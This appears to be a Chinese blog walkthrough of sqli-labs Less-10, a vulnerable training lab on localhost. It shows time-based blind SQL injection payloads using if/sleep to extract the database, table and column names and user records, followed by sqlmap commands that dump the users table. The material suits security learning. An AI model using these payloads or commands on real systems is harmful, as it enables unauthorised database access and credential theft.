1. 思路🚀
本關的SQL語句為:
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
- 注入類型:字符串型(雙引號包裹)
- 提示:參數id需以
"閉合
php回顯輸出語句的代碼如下:
if($row)
{echo '<font size="5" color="#FFFF00">'; echo 'You are in...........';echo "<br>";echo "</font>";
}
3種盲注,根據本關卡提示,選擇時間盲注:
- 布爾盲注:邏輯判斷
- 時間盲注:延時判斷 ?
- 報錯盲注:報錯回顯
2. 手工注入步驟🎯
我的地址欄是:http://localhost:8081/Less-10/,只需要將下面的sql語句粘貼即可。
2.1. 正常請求?
?id=10
說明:測試回顯情況
2.2. 排查數據庫?
先排查數據庫的長度,再排查數據庫名字。數據庫名字已知是:security,剛開始時可以通過<=``>=不等號進行大致范圍的判斷。
# 先查長度
?id=1" and if(length(database())=8,sleep(5),sleep(1)) --+
# 再查名字
?id=1" and if(substr((database()),1,1)='s',sleep(5),sleep(1)) --+
?id=1" and if(substr((database()),2,1)='e',sleep(5),sleep(1)) --+
?id=1" and if(substr((database()),3,1)='c',sleep(5),sleep(1)) --+
?id=1" and if(substr((database()),4,1)='u',sleep(5),sleep(1)) --+
?id=1" and if(substr((database()),5,1)='r',sleep(5),sleep(1)) --+
?id=1" and if(substr((database()),6,1)='i',sleep(5),sleep(1)) --+
?id=1" and if(substr((database()),7,1)='t',sleep(5),sleep(1)) --+
?id=1" and if(substr((database()),8,1)='y',sleep(5),sleep(1)) --+
if(語句,真:執行,假:執行):真假判斷,效果和三目運算符一樣
2.3. 排查表名?
# 查長度
?id=1" and if((select length(table_name) from information_schema.tables where table_schema=database() limit 3,1)=5,sleep(5),sleep(1)) --+
# 查名字
?id=1" and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 1, 1)='u',sleep(5),sleep(1)) --+
?id=1" and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 2, 1)='s',sleep(5),sleep(1)) --+
?id=1" and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 3, 1)='e',sleep(5),sleep(1)) --+
?id=1" and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 4, 1)='r',sleep(5),sleep(1)) --+
?id=1" and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 5, 1)='s',sleep(5),sleep(1)) --+
2.4. 排查字段?
我用sql語句查字段 ,依次顯示:id、username、password,但是索引映射:0→id、1→password、2→username
# 查長度
?id=1" and if((select length(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 2,1)=8,sleep(5),sleep(1)) --+
# 查名字
?id=1" and if(substr((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 2,1), 1, 1)='u',sleep(5),sleep(1)) --+
?id=1" and if(substr((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 2,1), 2, 1)='s',sleep(5),sleep(1)) --+
?id=1" and if(substr((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 2,1), 3, 1)='e',sleep(5),sleep(1)) --+
?id=1" and if(substr((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 2,1), 4, 1)='r',sleep(5),sleep(1)) --+
?id=1" and if(substr((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 2,1), 5, 1)='n',sleep(5),sleep(1)) --+
?id=1" and if(substr((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 2,1), 6, 1)='a',sleep(5),sleep(1)) --+
?id=1" and if(substr((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 2,1), 7, 1)='m',sleep(5),sleep(1)) --+
?id=1" and if(substr((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 2,1), 8, 1)='e',sleep(5),sleep(1)) --+
2.5. 獲取數據?
?id=1" and if(substr((select username from users limit 0,1), 1, 1)='D',sleep(5),sleep(1)) --+
?id=1" and if(substr((select username from users limit 0,1), 1, 1)='D',sleep(5),sleep(1)) --+
?id=1" and if(substr((select username from users limit 0,1), 1, 1)='D',sleep(5),sleep(1)) --+
?id=1" and if(substr((select username from users limit 0,1), 1, 1)='D',sleep(5),sleep(1)) --+
這是第一個用戶的賬號,以此類推,可以判斷出第二個用戶的賬號,第一個用戶的密碼等等。
2.6. 參數匯總表?
| 參數 | 作用 | 示例 |
|---|---|---|
" | 閉合符號 | id=1" |
--+ | 注釋符 | --+ |
length | 獲取長度 | length(database) |
substr | 截取子串 | substr(str,x,1) |
if | 真假判斷 | if(1,sleep(5),sleep(1)) |
information_schema | 系統數據庫 | from information_schema.tables |
table_schema | 數據庫名稱 | table_schema='security' |
table_name | 數據表名稱 | table_name='users' |
column_name | 字段名稱 | group_concat(column_name) |
3. SQLMap工具測試🎯
url地址換成自己的,后面一定要加上id=1,比如:http://localhost:8081/Less-10/?id=1
# 檢測注入點
python sqlmap.py -u "http://localhost:8081/Less-10/?id=1" --batch# 爆數據庫
python sqlmap.py -u "url" --dbs --batch# 爆表名
python sqlmap.py -u "url" -D security --tables --batch# 爆列名
python sqlmap.py -u "url" -D security -T users --columns --batch# 爆數據
python sqlmap.py -u "url" -D security -T users -C id,username,password --dump --batch
命令1截圖:
命令5截圖:
SQLMap參數表?
| 參數 | 功能 |
|---|---|
--batch | 非交互模式 |
--dbs | 枚舉數據庫 |
-D | 指定數據庫 |
-T | 指定表 |
-C | 指定列 |
--dump | 導出數據 |
4. 總結🏁
詳細的時間盲注解析,見文章"sqli-labs:Less-9關卡詳細解析":
https://blog.csdn.net/qq_62000508/article/details/149801083?spm=1011.2415.3001.5331
時間盲注和布爾盲注的實現大致一樣,無非在函數使用上的區別,詳細的函數介紹見第8關"sqli-labs:Less-8關卡詳細解析":
https://blog.csdn.net/qq_62000508/article/details/149797430?spm=1011.2415.3001.5331
聲明:本文僅用于安全學習,嚴禁非法測試! ???
-附完整Matlab免費代碼)
:Docker引擎與Docker Desktop)
新特性)
)
